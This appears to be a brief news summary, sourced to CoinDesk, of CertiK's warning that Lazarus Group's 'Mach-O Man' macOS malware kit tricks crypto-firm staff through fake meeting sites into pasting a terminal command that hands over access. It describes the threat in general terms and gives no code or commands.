Lazarus Group has become especially dangerous with new Mach-O Man attack: CertiK
Lazarus Group's new Mach-O Man attack uses social engineering to steal credentials and data from crypto firms.Summary
North Korea's Lazarus Group has launched a new, dangerous attack vector called "Mach-O Man," which exploits routine business calls to gain access to target systems. This modular macOS malware kit, created by Lazarus's Chollima division, uses a social engineering technique called ClickFix. Attackers send urgent meeting invites, leading victims to fake websites that prompt them to paste a command into their Mac's terminal to "fix a connection issue." This action grants attackers immediate access to corporate systems, SaaS platforms, and financial resources. CertiK researcher Natalie Newson highlights the group's increased activity and state-directed financial operations, emphasizing that Lazarus is a constant, well-funded threat to the crypto industry. The malware often erases itself after the breach, making detection difficult.
(Source:CoinDesk)